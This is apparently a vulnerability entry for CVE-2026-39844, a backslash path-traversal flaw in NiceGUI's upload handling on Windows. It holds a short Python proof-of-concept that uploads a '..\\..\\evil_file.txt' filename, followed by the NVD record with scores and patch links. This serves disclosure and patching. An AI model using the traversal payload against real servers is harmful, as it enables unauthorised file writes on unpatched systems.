CVE-2026-39844

import requests # Target URL (Example) target_url = "http://localhost:8000/upload" # The vulnerability relies on the use of backslashes which are ignored by PurePosixPath # but interpreted as path separators on Windows. # Attempting to write a file to the parent directory or root. malicious_filename = "..\\..\\evil_file.txt" files = { 'file': (malicious_filename, b'Arbitrary content payload', 'text/plain') } try: response = requests.post(target_url, files=files) if response.status_code == 200: print("[+] Upload request sent successfully.") print("[+] Check if the file was written outside the intended directory.") else: print(f"[-] Upload failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-39844", "sourceIdentifier": "[email protected]", "published": "2026-04-08T21:16:59.883", "lastModified": "2026-04-15T19:08:44.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NiceGUI is a Python-based UI framework. Prior to 3.10.0, Since PurePosixPath only recognizes forward slashes (/) as path separators, an attacker can bypass this sanitization on Windows by using backslashes (\\) in the upload filename. Applications that construct file paths using file.name (a pattern demonstrated in NiceGUI's bundled examples) are vulnerable to arbitrary file write on Windows. This vulnerability is fixed in 3.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zauberzeug:nicegui:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.0", "matchCriteriaId": "B1266F97-4CD4-4117-8666-9D5179E4B030"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://github.com/zauberzeug/nicegui/commit/d38a702e3af2da5b0708f689be8d71413fc77056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zauberzeug/nicegui/releases/tag/v3.10.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-w8wv-vfpc-hw2w", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}